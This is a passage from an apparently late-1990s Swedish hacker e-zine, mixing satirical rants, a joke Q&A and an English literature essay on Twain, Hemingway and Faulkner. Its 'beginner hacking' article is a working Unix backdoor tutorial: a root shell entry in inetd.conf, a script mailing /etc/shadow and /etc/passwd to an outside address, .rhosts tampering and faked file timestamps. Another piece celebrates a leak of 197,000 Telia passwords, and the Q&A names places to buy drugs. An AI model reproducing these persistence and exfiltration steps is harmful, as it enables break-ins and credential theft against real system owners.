visan. Baruch Spinoza uppfann hypertextlänkarna i sitt stora filosofiska verk "Etiken", där han länkar frenetiskt fram och tillbaka. "I would like to thank Ron and everybody out there in the office who is responsible for getting my favourite suit in the whole world back from those people at the laundromat. Thank you very much. I sewed it up myself. I ran out of thread round about *here*, but it's OK. These people kept my suit since last April. They wouldn't give it back to me." - Michael Stipe / R.E.M., under en livekonsert i Universal Amphitheatre, Los Angeles den 30/9 1986 En belysande liknelse, för att ni verkligen ska förstå den totalt rulande visdomen i det vi har att komma med: Tänk dig en liten svensk igelkott som heter Igge, och som har en flickvän som heter Iggelina. Precis som alla andra igelkottar så har de aldrig riktigt fattat att det där med att fälla ut sina taggar för att skydda sig mot omvärldens faror inte fungerar så bra när man är mitt ute på en motorväg och en massa bilar närmar sig. Jag har ingen som helst poäng med den här liknelsen. Jag bara skriver en massa skit för att ni ska bli irriterade på mig. Som ni har märkt är vi inte nöjda med samhället. Saker borde vara mycket mycket 0ndare! Folk borde strunta i att gå till jobbet, och runka med den fula blågula svenska flaggan istället. Är det då ingen del av samhället som vi uppskattar, förutom undergroundsfären? Svar: Jomen, matproduktionen är helt OK! Då tänker jag inte på de pjåkiga bönder som pratar om "lyckliga hönor som får gå ute i sin naturliga miljö", utan på de vanliga tuffa bönderna som har olyckliga hönor som proppas fulla med antibiotika och lider inne i sina minimala burar! TUFFHET! 0NDSKA! Vi skulle inte kommit på något ondare och värre, hur länge vi än hade smitt våra jävulusiska planer! Maximal respekt till Sveriges alla 0nda bönder! // Ulf of VSU ------------------------------------------------------------------------------ NYBÖRJARHACKING: BAKDÖRRAR -========================- OK, du har roffat åt dig en jämrans /etc/shadow-fil med någon 0nd teknik. Du har knäckt lösenorden i den filen med något 0nt program. Du har loggat in på systemet, och tagit över det - du har blivit r00t med någon 0nd exploit. Hur gör man sedan för att kunna fortsätta använda detta konto länge? Jo, man installerar en eller flera bakdörrar! Det har du säkert läst om i en och annan sensationslysten hackerbok ute på marknaden. Idén bakom detta är att om sysadminen upptäcker att han har fått in en massa hackerohyra och börjar byta lösenord och ta bort buggiga CGI-skript och uppdatera iChat-servrar och mountd-demoner och annat osorterat bråte som ligger och skräpar, så ska du fortfarande ha en chans att komma in. Du gömmer olika tjänster i systemet som du kan köra utifrån så att du kan komma in igen. Detta kan göras på olika sätt. En klassiker i sammanhanget är att skapa en ny TCP/IP-tjänst på datorn som du har hackat. Det låter svårare än vad det är. Man blir r00t på ett system (för att kunna editera olika filer obehindrat), och sedan redigerar man två filer, /etc/services och /etc/inetd.conf .. Här följer ett exempel. I detta exempel skapar vi en ny TCP-tjänst, som heter http2 och som svarar på port 37337! I /etc/services ska du lägga till en rad som kan se ut något i den här stilen: http2 37337/tcp http2 Denna rad säger att systemet kör en tjänst som heter http2, och att man kan anropa denna med en TCP-uppkoppling till port 37337. (Ni kan ju iofs välja något annat nummer - det där är ju lite uppenbart för folk som vet något om hackers och B1FF och sådant.) På många system är dessa tre fält inte ihop- skrivna som ovan, utan snarare uppspaltade i kolumner, och då ser det ju bäst ut om du gör det också. På vissa system är de olika raderna i denna fil sorterade efter portnummer, och då ser det bäst ut om du lägger in raden på sin rätta plats. I /etc/inetd.conf ska du lägga till en rad som kan se ut något sådant här: http2 stream tcp nowait root /bin/sh sh /lang/jamrans/sokvag/http2.svin.apa Den första kolumnen (http2) säger att det är det protokollet som det är frågan om. Det är bra att välja något protokoll som finns (som HTTP), och lägga till något versionsnummer som är alldeles för högt och betecknar någon version av HTTP som inte har kommit ännu (som HTTP/2.0). Då ser det vid första anblicken ut som en helt laglig del av filen, som sysadminen tycker ska vara där. De följande två kolumnerna (stream och tcp) säger att det är en TCP-uppkoppling det är frågan om. Den fjärde kolumnen (nowait) anger om kommandot ifråga ska köras en gång eller upprepade gånger. Skriv inte wait i den kolumnen, för då kommer din 0nda bakdörr att köras ett oändligt antal gånger, istället för en gång! Den femte kolumnen (root) anger vilken användare i systemet som kommandot ska köras som. Den sjätte kolumnen (/bin/sh) anger vilket program som ska köras. Resten av raden (sh /lang/jamrans/sokvag/http2.svin.apa) anger vilken kommandorad som /bin/sh ska köras med. Även för /etc/inetd.conf-filen gäller att man kan behöva placera in ovan- stående rad på någon plats i filen där den passar in. Sökvägen /lang/jamrans/sokvag/http2.svin.apa är bara menad som ett exempel. Här skriver du istället någon lämplig fil, som inte redan finns i systemet och som ligger långt bort i någon undanskymd katalog med några filer som ingen kommer att rensa bort men som ingen heller tittar på särskilt ofta. Ge filen ett namn som passar in bland de andra namnen i katalogen. En del människor tror att man ska lägga bakdörrar i /tmp-katalogen. Det är dumt, eftersom denna katalog rensas på många UNIX-system när de bootas om, och poängen med en bakdörr är ju att den ska finnas där och fungera när du behöver den om flera månader. Sedan skapar du filen i fråga, antingen den heter http2.svin.apa eller något annat. Denna ska innehålla kommandon till /bin/sh, där hela sökvägarna till alla kommandon och filer bör finnas med. Den ska inte ha någon inledande kommentarrad som anropar /bin/sh, eftersom vi redan har gjort detta anrop. Ett exempel på innehåll i denna fil: /bin/cat /etc/shadow | /bin/mail ewuyrewu@kurir.net /bin/cat /etc/passwd | /bin/mail ewuyrewu@kurir.net Kontot på kurir (eller hotmail eller något sådant) skapar du just för att ta emot lösenordsfiler från systemet. Andra roliga saker man kan göra här är att lägga till 0nda rader i .rhosts eller hosts.equiv-filer så att man kan logga in på systemet med rlogin utan att behöva några lösenord, eller att lägga upp en kopia av systemets /etc/shadow-fil i deras webserverkatalog under ett filnamn som det inte finns några länkar till någonstans. Då kan vem som helst som vet om URL:en hämta ner /etc/shadow-filen därifrån, men den märks inte för de som inte har fått URL:en. Kom ihåg att dessa kommandon körs som root, så du kan köra vilka kommandon som helst i den här filen. Var kreativ (och 0nd!). Inetd-demonen som sköter de flesta TCP/UDP-uppkopplingar till UNIX-system (men inte riktigt alla, exempelvis HTTP-servrar brukar klara sådant där själv för hastighetens skull) fattar lite trögt. Den märker inte att man ändrar på /etc/services och /etc/inetd.conf, så man måste säga till den. Det gör man genom att skicka en HUP-signal till den. Då läser den in filerna igen, och fortsätter sedan att jobba som om inget hade hänt. Hur skickar man en HUP-signal till inetd-demonen? Jo, först måste du veta vilket processnummer som inetd-demonen har. Det får du reda på med kommandot "ps". Detta har olika parametrar i olika dialekter av UNIX. Du kan prova med "ps aux |more" och "ps -Af |more". Den siffra som står på samma rad som inetd är processnumret. Sedan skickar man en HUP-signal med kommandot "kill -HUP numret". Sedan ska det fungera! Prova genom att telnetta till systemet på port 37337 eller någon annan port som du har valt. Systemet ska koppla upp och sedan koppla ner inom en sekund. Kontrollera nu att allt som ska utföras i din bakdörr verkligen har körts, att alla mail har skickats och att alla .rhosts- grejer och webändringar har genomförts. En extra finess är att ändra alla dessa filers ändringsdatum, så att det inte syns så tydligt att du har ändrat dem just idag. Det gör man med kommandot "touch -t tid filnamn", där tid har formatet 199505301122 för klockan 11:22 den 30:e maj 1995. Då kommer det att se ut som om filerna senast ändrades denna tidpunkt, om någon tittar på filerna med kommandot "ls". UNIX-system har flera tidsangivelser för varje fil, och detta ändrar inte på alla dessa, så en elitsysadmin kommer att märka att tiderna är ändrade. Å andra sidan är det troligt att en elitsysadmin vet vad /etc/services och /etc/inetd.conf är för filer, och att han/hon också vet att HTTP/2.0 inte finns, så när det gäller mer kunniga människor får du hitta på tuffare bakdörrar än så här. Vad finns det för bakdörrar som är tuffare? En rolig grej är att ändra olika systemprogram som /bin/login eller telnetd-demonen eller något annat, så att de ser ut att fungera som vanligt men har någon liten extra finess (som att man alltid kan logga in som root om man anger lösenordet "VSURULAR", oavsett vad root egentligen har för lösenord). Detta kräver att du har tillgång till källkoden för det program du vill ändra, för exakt den version av operativ- systemet som datorn som du hackar kör. Det är viktigt att det är exakt rätt version, för annars kan saker börja krångla och då kommer de definitivt att misstänka att de fått hackare i sina maskiner. Om de kör Linux kan det tänkas vara lätt att få tag på dessa källkoder, men om de kör HP-UX eller någon annan kommersiell UNIX kan det vara svårare. När du har fått tag på denna källkod gör du bara erforderliga ändringar och kompilerar programmet. Finns det några metoder för sysadminmänniskor att upptäcka ändringar i dessa systemfiler (/etc/services och /etc/inetd.conf)? Ja. Förutom den manuella metoden (att gå igenom filerna med "more" då och då, och se om någon har gjort något styggt) finns det program som automatiskt med jämna mellanrum räknar ut en checksumma på vissa filer, jämför den uträknade checksumman med en gammal checksumma som är lagrad i en fil, och slår larm om checksummorna inte stämmer. Ett populärt sådant checksummessystem heter MD5. Teoretiskt sett borde det ju gå att hacka MD5 efter att man har blivit root, och ta bort det eller rent utav fejka filen där checksummorna lagras, så att MD5 fortfarande är igång men tror att allt är OK även när det inte är det. (Vi kanske kan återkomma till detta i något kommande nummer.) Det var meningen att det skulle vara ännu mer tekniska artiklar i detta sjätte VSU-nummer. Jag har hållit på med TCP/IP och 0nda IP-datagram och det gamla goda ultravåldet den senaste tiden, och det var meningen att åtminstone ett av de program jag håller på att utveckla skulle vara med i det här numret. Men det sket sig, eftersom UNIX-systemet där jag utvecklar dessa program krånglade ovanligt mycket. Men mycket TCP/IP-material utlovas alltså, i nästa VSU. Tills dess, kom ihåg att våga vägra fönstergränssnitt med ikoner, möss och annat skräp! KOMMANDORADEN ÄR NÖRDENS NIRVANA, LJUSET I TUNNELN SOM VI ALLA STRÄVAR EFTER ATT NÅ! // Ulf of VSU ------------------------------------------------------------------------------ TELIAHACKET -=========- En kort tid efter att vårt förra nummer kom ut genomfördes det kanske tuffaste hacket i Sverige någonsin. Jag talar naturligtvis om Teliahacket!! Ett gäng 17-åringar tog sig in i Telias maskiner genom deras POP-mailserver. Denna mailserver var utvecklad av Qualcomm, och hade en buffer overflow-bug som numera är fixad. (Buffer overflow-buggar uppstår när inkompetenta programmerare definierar att en sträng max ska vara ett visst antal tecken lång, och sedan glömmer bort att kolla att det som kopieras in i strängens utrymme i minnet inte får vara längre än så. Om man skickar en speciell sträng till programmet, som har ett kort assemblerprogram på ett strategiskt viktigt ställe i strängen, kan man som utomstående få en server att utföra valfritt kommando. Motsvarande teknik används på datorer där man har ett konto som inte är root, om man vill bli root. Då skickar man speciellt uppbyggda strängar till program som är SUID root.) Sedan tog de fram giltiga lösenord till alla 197 000 konton som de fick tag i. Telias gamla lösenordsalgoritm var korkad, så det var enklare än vad det skulle ha varit på ett UNIX-system. Den färdiga filen, med 197 000 användar- namn och lösenord lades ut på Internet. För att visa syftet med detta hack skrev de också ett meddelande om att Telia borde införa "flat rate", längst upp i textfilen. Media gick igång på detta på allvar. TV-nyheter och dagstidningar som normalt sett rapporterar väldigt litet om datorunderground tog upp detta. Telia fick även förklara sig för Datainspektionen. Jag tror ju inte att Telia kommer att införa "flat rate", bara för att några hackers säger åt dem att de vill ha det. Om de åker fast för detta kommer de förmodligen att få grova straff. Men iallafall, vilket tufft hack! Ord!! Titta gärna på hackets officiella hemsida (http://surf.to/telia020) som har olika länkar till textfilen på olika sites, fler länkar till artiklar om hacket i massmedia, och en Java-applet där man kan röja runt med hr Arnestigs ansikte ;) .. Det fanns också en annan websida förut, som hade teknisk information om Telias konton, med olika algoritmer och knäckningsprogram som man kunde ladda ner, men den är tyvärr nerlagd. Lösenordsfilen finns fortfarande att få tag på. Att försöka använda något av de Telia 020-konton som finns med i den rekommenderas inte, eftersom Telia har varit snabba med att både byta ut lösenord och att busta folk som använder lösenorden olovligt. Men den finns att ladda ner här och där, för er som vill ha kvar den som en souvenir från ett av de tuffaste hacken någonsin i Sverige. // Ulf of VSU ------------------------------------------------------------------------------ Q & A -===- Hej och välkomna till vår astuffa frågespalt. Här svarar vi på några frågor som vi har fått sedan sist. Skicka gärna in flera frågor, på vår fina adress harnhammar@yahoo.com .. (1) Kära VSU, nu har man återigen suttit framför televisionapparaturen och sett politiker spy sin korrumperade väljar-exploitkod likt svart galla över tilltänkta offer (läs pensionärer, ungdomar, invandrare, barnfamiljer, ensamstående mödrar) men nu var det något som inte stämde.. Det hade dykt upp ännu ett hot ur det slemmiga västkustavloppet i form av en programledare för ett så kallat "underhållningsprogram" vars grundläggande funktion är att förruttna hjärnorna samt tanka pengar från de dumma massorna. Han satt helt enkelt bara där och insöp bajsätarnas exploits i syfte att utveckla det ultimata takeoverscriptet. Han hade förberett det hela skickligt genom att i sina program bryta ner folks mentala motståndskraft med dansbandsmusikstortyr å det grövsta för att sedan muta de få opåverkade med några miljoner hit och dit, vilket fick folket att tro att det rörde sig om en "go gubbe", och inte ännu en antikrist som vi klarsynta förstod. (Det var rätt enkelt egentligen.. Den utpekade nöjesprofilen hade nämligen mustach och det hade även Hitler, så det så!) När det väl är dags för val så kommer detta monster att slunga sig upp likt gårdagens middag på barrikaderna och påminna massorna om att pengar är den enda lyckan och att de egentligen skiter i politiska frågor. De skall ge honom makten för han har cashen, och har någon en åsikt så är det bara att köra ner en fet sedelbunt i käften på dissidenten så blir han glad. Sedan tvingas Sveriges invånare att gå runt utklädda till lila björnar under en massiv bombard av dansbandsmusik.. Nu till min fråga: Vad skall jag göra? Säg inte att jag skall prata med någon vuxen eller kuratorn. Jag har redan försökt det, men de var inblandade i konspirationen och sa att jag var galen och ville låsa in mig. Jag kämpade för mitt liv och undkom.. // 94n1/< Svar: Det här är en mycket viktig insändare för alla som är det minsta intresserade av politik. Klarsynt beskriver den hur det egentligen är i Sverige idag. Några små tillägg: nöjesprofilen i fråga intervjuade alla våra partiledare i TV kort innan valet. Kan det vara för att han skulle komma åt att söva ner dem och operera in radiosändare i deras hjärnor? Carl Bildt (MMMarabou) ville först inte bli intervjuad. Kan det vara för att han hade genomskådat den 0nda komplotten från villaområdena? Valstugorna vid Sergels Torg i Stockholm var utplacerade mitt emot Sandy's, som vi redan har avslöjat som en av de verkliga maktfaktorerna i komplotten. Tror ni att det bara är en tillfällighet? Bevisen är överväldigande! (Observera vad hårt vi anstränger oss för att skaffa oss ett rykte som ett svenskt, hyperexcentriskt svar på Karl Koch. Ifrågasätt alltid allas motiv till allt.) Dessutom kan man verkligen undra varför denne nöjesprofils uschla TV-program pågår så jämrans länge. Kan man kanske se det som ett slags buffer overflow- funktion, som på alla dessa 0nda exploitz som man laddar ner från http://www.rootshell.com/ och http://www.insecure.org/ eller något? Är det så att om man sänder tillräckligt länge uppstår en buffer overflow i massmänniskornas hjärnor, så att man kan ta över dem på rootnivå och få dem att göra vad som helst? Detta kräver närmare forskning! Vad man ska göra åt det? Ja, säg det. Själv tänker vi fortsätta som vanligt med att leva på socialbidrag och knarka och hacka sönder UNIX-maskiner och sända ut 0nda IP-paket på nätet och dra över horor. (2) Har ni någon syra att sälja? // (jag har verkligen fått ett sådant brev, men namnet är bortcensurerat) Svar: Eh, jag TROR inte att jag tänker langa till folk som jag inte känner som hör av sig till mig över nätet. Även om man har en tuff epostadress, typ mephistophelez@unix-nrrrdz.org, är ju inte det någon garanti för att man inte jobbar på Polisen. Det enda man bevisar genom att ha en sådan adress är att man känner den som har registrerat den domänen, och även poliser kan ju skaffa sig sådana kontakter, just för att nästla sig in bland hackers. Men om du vill ha droger är ju http://www.smartdrugstore.com/ en bra lösning. Annars kan man ju åka ner till Christiania en sväng, fast det blir jävla dyrt om man bor i Norrland. Om man bor i Stockholm kan också Plattan på Sergels Torg och diverse förorter med dåligt rykte långt ut på blå tunnelbanelinje vara en lösning för wannabe-knarkaren. (3) Kan ni inte skriva mindre om politik och mer om datorer? Mina föräldrar bor faktiskt i villa, så jag blir lite sårad när ni skriver så där. Jag är själv ganska datorintresserad, men främst håller jag på med data för att kunna göra karriär och tjäna mycket pengar som en riktig vinnare om några år. Jag har satsat på Coad/Yourdons systemeringsmodeller och programmeringsspråket SmallTalk, för det tror jag att näringslivet kommer att efterfråga i framtiden. // Runar of Villaområdet i Lotorp Svar: SVIN! APA! HAT! DÖ! (4) Jag såg att ni beskrev er gamla inriktning som "ironisk humor" i VSU#5. Är även de texter i VSU som kritiserar kommersialiseringen av datorbranschen menade som underhållning, eller finns det någon allvarligare undermening som ligger bakom? // W3ir0n of Ung Vänster, storkonsument av palestinaschalar och National- teatern-skivor, medlem i Mikael Wiehes fanclub Svar: Den allvarliga undermening som finns där är samma som hos open source-rörelsen (ni vet, GNU-projektet och Linux-människorna och de där). Vi tycker att alla datorprogram bör spridas fritt och gratis med källkod, och att även all annan information bör spridas fritt och gratis, och vara tillgänglig för alla. Vi inser att det är annorlunda med andra delar av IT-branschen, och det är OK att datorer, Internetuppkopplingar och support kostar pengar. Men med programmen förhåller det sig lite annorlunda. Jag menar, det är ju inte en tillfällighet att open sourceprogrammen i UNIX-världen är så pass mycket bättre och säkrare än sina kommersiella motsvarigheter för Windows. (En av många anledningar att slänga ut Windows och börja köra UNIX redan idag.) Kolla gärna http://www.gnu.org/ och http://www.opensource.org/ om ni orkar någon dag. (5) Hur packar man upp "upldbomb.tgz"? Det funkar junte med PKUNZIP! Förresten, vet ni hur man hackar Telias hemsida? // 3v17 M364 w4rr10R+++ / 73610n 0F 3x9701+zZZz Svar: SVIN! APA! HAT! DÖ! // Ulf of VSU ------------------------------------------------------------------------------ EN AKADEMISK REDOGÖRELSE ÖVER VARFÖR TJUVSAMHÄLLET SUGER KUK -==========================================================- Här är en litteraturuppsats från en av kurserna som ingick i Engelska C, som jag pluggade när VSU startade. En del av er kommer säkert att tycka att det verkar skittrist, och en del andra är säkert inte tillräckligt bra på engelska för att förstå poängen. Jag tycker ändå att innehållet i uppsatsen har mycket med VSU att göra, så därför tar jag med den här. Den här uppsatsen använder litteraturvetarens främsta verktyg: gamla klassikerböcker från litteraturens kanon och resonerande runt dessa böcker på ett teoretiskt plan, gärna med referenser till diverse filosofer. Poängen med uppsatsen som inte är helt tydlig förrän i det sista stycket är att argumentera mot civilisation och samhälle i allmänhet, och alla universitet och högskolor i synnerhet, eftersom jag menar att mycket av det förtryck som syns i de tre böckerna som jag skriver om uppstår just ur denna civilisation och ur universiteten med deras logiska resonemang och just deras litterära kanon. Jag använder alltså litteraturvetarens verktyg mot litteraturvetaren själv! Bland det mer rebelliska som jag har skrivit, enligt min egen åsikt. Uppsatsen tar upp tre gamla klassiker av Hemingway, Twain och Faulkner. Även den engelska titeln på min uppsats är förresten en pik till alla överdrivet pretentiösa uppsatstitlar som alla akademiker brukar hålla sig med. Här börjar eländet: ------------------- Stockholm University Department of English The American Novel before 1945, Group II Take-Home Exam RELIGION, CAPITALISM, FREEDOM AND IDENTITY IN THREE NOVELS FROM THE LITERARY CANON Author: Ulf Härnhammar Supervisor: David Minugh In _The Adventures of Huckleberry Finn_ and _The Sun Also Rises_, as well as in _The Sound and the Fury_, the environment that the protagonists exist in is mostly one of untamed nature. It has got the same attributes that we usually associate with it: it is emotional, wild and passionate - sometimes (but not always) in a dangerous way. Every good story needs a conflict, and in these three novels there is one between nature and human behaviour governed by rules, as in the religious and economic themes that feature prominently. In _The Adventures of Huckleberry Finn_, Huck and Jim have got their own set of morals that differ from the morals in the society that they live in. According to Swahn, to live on a raft is to be free, but as a cold counterweight against this freedom, they have brought the facts of money and power abuse along on their journey (Swahn in Twain, 300). At one point, Twain even makes it obvious that nature is in fact very powerful and controls life and death: Huck and his father disappears, and everyone thinks that they are dead, while they are in fact hiding out in the woods. In _The Sound and the Fury_, characters such as Caddy, the female Quentin and Benjy are all governed more by emotion than by thought. Both Caddy and the female Quentin have sex when they want to, as opposed to Gerald and his friends at university who see those things more as a vehicle to further their career. There are even hints of an incestuous relationship between Caddy and the male Quentin (Faulkner, 279). As the female Quentin puts it: "I dont care [...], I'm bad and I'm going to hell, and I dont care. I'd rather be in hell than anywhere where [Jason is]" (Faulkner, 207). Caddy's father is not really one of these emotional characters, but he does drink himself to death. They even have to castrate Benjy (Faulkner, 270), to be able to control his emotional life. In _The Sun Also Rises_, the characters go back and forth between emotional and cold behaviour. They behave differently in Spain, when faced with the raw emotion of the bull fighting, than they did back in France. There are also points of similarity between the freezing out of Cohn, after he dares to show some real emotion, and the bulls' rejection of the steer in the fights. This type of emotional behaviour that I have described in the previous few paragraphs can be defended by several philosophical and political theories. Friedrich Nietzsche's theories of the revaluation of all values, "the essence of the world is the will to power" and the doctrine of the uebermensch fit particularly well (Filosofin Genom Tiderna: 1800-talet, 134-137), especially as he disliked Christianity as much as Caddy or Brett do. Nietzsche also thought it fatal to disregard the Dionysian element - the wild and ecstatic, and that the purely intellectual, analytical tradition is devastating (Fredriksson, 191). David Hume with his theories about passion and Rousseau with his noble savage are two other philosophers who also thought it more important to listen to your emotions than to follow rules (Filosofin Genom Tiderna: 1600- och 1700-talet, 263-264). There are also some political ideologies like neo-liberalism or anarchism that want more freedom for the individual, which allow people to follow their emotions more than they do now (Larsson, 82, 112). If we leave the characters governed by emotion behind and concentrate on the colder characters, we have Emmeline in _The Adventures of Huckleberry Finn_, who dies with a painting featuring too many arms (Twain, 137), as she cares more about how things look than whether the whole painting does communicate anything emotionally true. Mrs Hotchkiss in the same novel does not come across as a very open-minded and free-spirited person either (Twain, 355), and somehow we understand Huck when he chooses to go on travelling instead of spending the rest of his life listening to her. In the same collective of people who think too much and do not listen to their feelings, we also have Tom Sawyer, who according to Swahn is poisoned by literature and incapable of seperating between fiction and the real world, thus trying to force the rules of fiction on the real world (Swahn in Twain, 300). Huck's fellow companions continue on the same unemotional theme when they show unbelievable cruelty by selling Jim for 40 dollars. In the same way, people in _The Sun Also Rises_ are false enough to have friends or even wives that they do not really like, and the French people in the book are prepared to like anyone who give them lots of tips (Hemingway, 245). The set-up boxing-matches (Hemingway, 77) and the fire baloons that people fail to send up (Hemingway, 187-188) serve as a fitting background to the failure of civilization. In _The Sound and the Fury_, Jason tries very hard to follow the rules dictated to him by the economic and religious worlds, but it does not make him very happy, nonetheless. When the male Quentin tries to help the poor girl, everyone thinks that he is going to abduct her (Faulkner, 144 ff), as they all live in a world where altruism does not exist. When we talk about the rules that religion dictate, it is important to note that free will has to exist for the concept of good or bad behaviour to be meaningful. In a monist and singular world such as the one described by philosopher Spinoza (Filosofin Genom Tiderna: 1600- och 1700-talet, 118), where everything is one substance and where everything is predetermined, the concept of good behaviour is meaningless. Spinoza thought that we are not able to do anything God does not want us to, as God is the world. Obviously Benjy has not made the choice to become what he is, but has Caddy or the female Quentin done such a choice? There is also a lot of playing around with identity in these novels. Huckleberry dresses up like a girl, and later he pretends to be Tom and Tom pretends to be Sid. Of course, his fellow travellers also make it obvious that anyone could pretend to be a king or learn to behave like a Harvard graduate. In _The Sound and the Fury_, people's names get changed and re-cycled a lot. Identity is something very fluid, like in the very interesting part of _The Adventures of Huckleberry Finn_, where Jim and Huck say that the French speak French and that cats do not speak like cows (Twain, 108-109). There is a difference, however: the French have learned to speak French, while the language of cats are ruled by their genes. This reminds us of Aristotle and his theory of the substance, the first of his ten categories, the essence of a thing (Filosofin Genom Tiderna: Antiken, Medeltiden, Renässansen, 165-166). The oppression described in all these novels are not built into people's genes the same way that cows have to make certain sounds. The dualism that is the topic for this essay causes oppression, but this is something temporary that we can change. We have to remember that the satisfaction that Gerald's mother gets out of her son's career choices is in many aspects similar to the satisfaction that Benjy gets out of looking at his favourite mirror. Harvard is just a dead word (Faulkner, 193), signifying nothing. BIBLIOGRAPHY PRIMARY SOURCES Faulkner, William. _The Sound and the Fury & As I Lay Dying_. New York: Random House, 1946. Hemingway, Ernest. _The Sun Also Rises_. Stockholm/London: Zephyr Books, 1947. Twain, Mark. _The Adventures of Huckleberry Finn_. Stockholm: Zephyr Books, 1944. SECONDARY SOURCES _Filosofin Genom Tiderna: 1600- och 1700-talet_. ed: Marc-Wogau, Konrad. Karlshamn: Thales, 1992. _Filosofin Genom Tiderna: 1800-talet_. ed: Marc-Wogau, Konrad. Karlshamn: Thales, 1993. _Filosofin Genom Tiderna: Antiken, Medeltiden, Renässansen_. ed: Marc-Wogau, Konrad. Karlshamn: Thales, 1991. Fredriksson, Gunnar. _20 Filosofer_. Stockholm: Pan/Norstedts, 1997. Larsson, Reidar. _Politiska Ideologier I Vår Tid_. Lund: Studentlitteratur, 1990. Swahn, Sven Christer. (an essay on _Huckleberry Finn_). Published in: Twain, Mark. _Huckleberry Finns Äventyr_. Stockholm: Klassikerförlaget Niloe, 1992. // Ulf of VSU ------------------------------------------------------------------------------ ...... -====- Kibo. Fnord? Commodore Teenage Riot! En av en miljon exakt likadana svenska $ofia-flickor ramlade ner i en flera kilometer djup gatubrunn, och sedan var det bara 999999 exakt likadana svenska $ofia-flickor kvar. Unge man nu schka ja berätta förej va live' går upå! Klart grabben ska ha en SCUD-missil! Monique, take the tigers away! // Ulf of VSU